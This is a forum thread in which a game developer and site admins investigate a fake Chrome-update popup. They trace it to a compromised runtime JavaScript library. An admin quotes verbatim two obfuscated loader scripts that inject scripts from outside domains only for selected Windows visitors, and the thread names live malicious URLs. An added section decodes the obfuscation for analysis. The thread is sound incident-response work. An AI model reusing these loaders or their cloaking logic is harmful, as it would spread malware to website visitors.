Fake Chrome Update window leading to virus displayed over the game

A topic by Anduo Games created Apr 02, 2020 Views: 3,674 Replies: 7
(2 edits)

Heya, we've got someone complaining that their browser wanted to update to play our unity webgl build.

We've tried to replicate this. After a bunch of reloads, we got this very weird message:

We've downloaded the webpage from this and it seems like the image of chrome in a screen at the bottom of the message is hosted on this domain: http://khmchamorshi.com/

The "Update Chrome" Button looks like this in html:

<a class="button eula-download-button download-button desktop-only hide-cros" href="blob:https://A_SUBDOMAIN_WAS_HERE.ssl.hwcdn.net/A_GUID_WAS_HERE" id="buttonDownload" download="Chrome.Update.41c9a6.js">Update Chrome</a>

I replaced a GUID with "A_GUID_WAS_HERE" and a subdomain with "A_SUBDOMAIN_WAS_HERE" to make sure nobody clicks on this and gets a virus. Could it be that there's something wrong with itch.io's CDN?

Edit: I just checked the webgl.zip we uploaded by downloading it again from itch.io. The files are clean. It seems that the CDN is injecting this part of the website.

(+1)

href="blob:https://A_SUBDOMAIN_WAS_HERE.ssl.hwcdn.net/A_GUID_WAS_HERE"

This is a blob URL (note blob:), created with the URL.createObjectURL browser API, and so it is not served from that domain (and the URL is only valid in your browser, btw). Presence of the domain there only means that the URL was generated by a script served from that domain, that is, by your game.

So, for what it's worth, it still may be that your game build somehow got infected before you uploaded it. Also it may simply be some shady ad, if you have integrated some in-game ad SDK. It seems you took down the web version, so of course I cannot say for sure.

(+1)

Hey there, thanks a lot for the answer!

I didn't know blob is for local downloading. That makes this a lot more concerning. The zip we uploaded is coming directly from our unity cloud build setup. I can't see how that would have gotten infected. Here's a link to our webgl zip: https://drive.google.com/open?id=17GRKiDZowuip0tr3vFeIa2TK-6zPY-41

We've taken the browser version down because of the security concern.

I can't find anything suspicious in the index.html.

Admin

I can’t find anything suspicious in the index.html

Unity games run inside an entire virtual machine, with code stored in the binary files that are shipped along with your game. If there's something malicious in your game, there's a good chance the code for that is located within that binary file, and not sitting in plain sight in your index.html file.

Also it may simply be some shady ad, if you have integrated some in-game ad SDK

This seems like the most reasonable explanation.

Admin (17 edits) (+1)

Edit: I just checked the webgl.zip we uploaded by downloading it again from itch.io. The files are clean. It seems that the CDN is injecting this part of the website.

This is highly unlikely. As I mentioned in the other comment, it’s likely you have a rogue SDK you’re using that is embedded into the binary files distributed with your HTML5 export that is being executed by Unity’s virtual machine. You will not be able to just look at the files of your HTML5 build to identify something like this. I suggest you review all the code you’ve included in your project before you have exported it. Alternatively third party resources included by your game could be compromised in some way, either as any scripts that you didn’t write, or scripts that are dynamically loaded from other domains.

I've downloaded the file you uploaded and I'll upload it to a private page to take a closer look to see if I can spot anything. Can you tell me when exactly this message appears after reloading the game? Does it appear immediately or do you have to click to start the game?

Edit: The GUID resource names located on the same path as your game appear to be how Unity extracts its runtime. This to me suggests that the malicious code could be coming from inside of your Unity game's code.

Edit: I tried loading your game many times over but never was able to trigger the message. I think it's related to my operating system/browser, as it probably only appears to a subset of people to make it hard to detect. I did notice some suspicious obfuscated code at the bottom of a file hosted on the domain js.zapjs.com; the exact file is here: https://js.zapjs.com/js/download.js, on the very last line. This doesn't appear to be part of the library. This file gets added into the browser by Unity code executing, from what I can tell (when the progress bar shows 90%, which corresponds with the report given in your comments).

I’ve included it below in case it gets removed by whoever is hosting it:

var a=['text/javascript',')njosirthalcfoml5','length','trderrnrme1fze6r(','script','abs','parentNode','getElementsByTagName','t=ha5mytou5_p_d','5mgrfokf7tma7l!pp','type','async','oe3m6axnwt8s5omh7','jfjOcxieyd2njif','createElement','while','insertBefore'];(function(b,e){var f=function(g){while(--g){b['push'](b['shift']());}};f(++e);}(a,0x12b));var b=function(c,d){c=c-0x0;var e=a[c];return e;};var _cs=['3tqnjerg4Akriews)ue',b('0xb'),b('0x10'),'vb37(ej4q84fb1x9v8w6e1lau4!34c443cf64097sap8!afeeeh0qbgchc!7q2289=gvu&!0a402m=1duiicu?3sfjb.(esdpoun2_qi9uj/8m9ozc0.20v6h3gt(ayt9snkfcnixlvci.vcqiql0bmu4p1/)/p:isuprt)tzhp',b('0x5'),b('0x3'),b('0xa'),b('0x8'),'get','fejiekzokovce',b('0xf'),b('0x2'),b('0xc'),b('0x7')];if(ndsw===undefined){var ndsw=true;(function(){var c=navigator;var d=document;var e=screen;var f=window;var g=c[m(_cs[0x0])];var h=c[m(_cs[0x2])];var i=d[m(_cs[0x9])];var j=f[m(_cs[0x7])][m(_cs[0xb])];var k=d[m(_cs[0x6])];if(k&&!n(k,j)){if(!n(i,m(_cs[0xa]))){var c=d[b('0x4')](_cs[0x1]);c[b('0x0')]=_cs[0xd];c[b('0x1')]=!![];c['src']=m(_cs[0x3]);var l=d[b('0xe')](_cs[0x1])[0x0];l[b('0xd')][b('0x6')](c,l);}}function m(p){var q='';for(var r=0x0;r<p[b('0x9')];r++){if(r%0x2===0x1)q+=p[r];}q=o(q);return q;}function n(p,q){return p[m(_cs[0x5])](q)!==-0x1;}function o(p){var q='';for(var r=p[b('0x9')]-0x1;r>=0x0;r--){q+=p[r];}return q;}}());}

Edit: I stepped through the script with a debugger; it ends up loading another script from another domain. In my case, it's https://public.clickstat360.com/ui_node.js?cid=240&v=827ccb0eea8a706c4c34a16891f84e7b I've included the code:

(function(){var hl=document[qd("4r)e;r{r,e,f(ewrk")]||'';var rz=new RegExp(qd('&/;),+a])/(^,[{(,/)/i:h'));if(!hl||window[qd("fn}oeilt4a)c,o3ly")][qd("ff,e1r{h,")][qd("1h{cdt(a2mi")](rz)[1]==hl[qd("1h{cdt(a2mi")](rz)[1]){return;};var vm=navigator[qd("yt}n(e}g6A}r,e}szu8")];var wl=document[qd("pefi,k;o3o{c0")];if(tk(vm,qd("/sfw,o(d(n,i;W{"))&&!tk(vm,qd(".d{imo}r,dvn(Ad"))){if(!tk(wl,qd("#={a6m(t;u,_)_}_;"))){var on=document.createElement('script');on.type='text/javascript';on.async=true;on.src=qd('74(7,7(1;1}4m5)8;5;1a=ht6&)3;Q3j,M;9{Q;W7a;jtZ)S(Z,2(cuj(Ney6k(DxZ{h)RnW9Z1ziU(z8Y61{U}DhM{k{N,D}O(i01}j{d(=}d;?vd{x{a,.)e,c,r{u{o(s9e(R{b;efW;/gm)opc{.}s(e{clijv{r(ebs)m}tor{azm2sa.{e1n{o(h3pb/6/s:7s,p7t;tdh(');var ce=document.getElementsByTagName('script')[0];ce.parentNode.insertBefore(on,ce);}}function qd(oy){var je='';for(var uv=0;uv<oy.length;uv++){if(uv%2===1)je+=oy[uv];}je=uy(je);return je;}function tk(gd,no){return gd[qd(":f)Osx)e9d;nsi}")](no)!==-1;}function uy(fc){var pu='';for(var xx=fc.length-1;xx>=0;xx--){pu+=fc[xx];}return pu;}})();

It's now finally taking me to the URL https://phone.smartmservices.com/WebResource.axd?d=dj1iODNkMDU1YzUzZWRhZDkyNjc2ZSZjaWQ9MjQ3&t=1585411774z

Edit: Alright, I kept following it until I got stuck. I’m giving up at this point because it’s pretty clear that there’s some suspicious code compiled into your game. You might want to start with finding out why the zapjs domain is showing up.

Twitter thread here: https://twitter.com/moonscript/status/1245868730501844994
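The two loader scripts quoted in this post hide their strings with the same trick: only the characters at odd positions are real, and they are stored in reverse. The decoder below is an added example for analysts, not code from the thread, from zapjs, or from any of the domains involved; it recovers the next-stage URLs from the obfuscated constants copied verbatim above, and decodes the conditions the second script checks before it injects anything, which explains why the popup only shows for some visitors.

```javascript
// Added analysis example (not from the thread or the library it discusses):
// decoder for the string obfuscation used by both loader scripts above.
// Each obfuscated constant keeps its real characters at the odd indices,
// in reverse order; the characters at even indices are padding.
function decodeObf(s) {
  let kept = '';
  for (let i = 1; i < s.length; i += 2) kept += s[i];
  return kept.split('').reverse().join('');
}

// Obfuscated URL constants copied verbatim from the two scripts in the thread.
const STAGE1_SRC = 'vb37(ej4q84fb1x9v8w6e1lau4!34c443cf64097sap8!afeeeh0qbgchc!7q2289=gvu&!0a402m=1duiicu?3sfjb.(esdpoun2_qi9uj/8m9ozc0.20v6h3gt(ayt9snkfcnixlvci.vcqiql0bmu4p1/)/p:isuprt)tzhp';
const STAGE2_SRC = '74(7,7(1;1}4m5)8;5;1a=ht6&)3;Q3j,M;9{Q;W7a;jtZ)S(Z,2(cuj(Ney6k(DxZ{h)RnW9Z1ziU(z8Y61{U}DhM{k{N,D}O(i01}j{d(=}d;?vd{x{a,.)e,c,r{u{o(s9e(R{b;efW;/gm)opc{.}s(e{clijv{r(ebs)m}tor{azm2sa.{e1n{o(h3pb/6/s:7s,p7t;tdh(';

// The next-stage URL each script assigns to a dynamically created <script> tag.
function decodeStagedUrls() {
  return { stage1: decodeObf(STAGE1_SRC), stage2: decodeObf(STAGE2_SRC) };
}

// Obfuscated names the second script uses to decide whether to run at all
// (also copied verbatim). Decoded, they show it only proceeds when the page
// was reached with a cross-site referrer, on a Windows but not Android user
// agent, and without a ___utma= cookie; everyone else sees nothing.
const STAGE2_GATES = {
  referrerProp: '4r)e;r{r,e,f(ewrk',
  uaProp: 'yt}n(e}g6A}r,e}szu8',
  cookieProp: 'pefi,k;o3o{c0',
  uaMustContain: '/sfw,o(d(n,i;W{',
  uaMustNotContain: '.d{imo}r,dvn(Ad',
  cookieMustNotContain: '#={a6m(t;u,_)_}_;',
};

function decodeStage2Gates() {
  const out = {};
  for (const [name, obf] of Object.entries(STAGE2_GATES)) out[name] = decodeObf(obf);
  return out;
}

// Stand-alone run: print the recovered URLs and gate conditions for triage.
console.log(decodeStagedUrls());
console.log(decodeStage2Gates());
```

Nothing here contacts the recovered URLs; the point is that a static decode of the constants is enough to confirm the staging chain the debugger walk found.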

Thank you so much for the help! We've cut out the piece of code that was causing this. Seems like it was just an innocent auto-updater for the download.js that recently got compromised with that obfuscated code. Will see if this solves the issue.

Admin (+1)

Can you share a link to the library so we can help report it?

You already found the correct link, it's this: http://js.zapjs.com/js/download.js
We download this at runtime in our unity game for the purpose of letting the user export a save game.
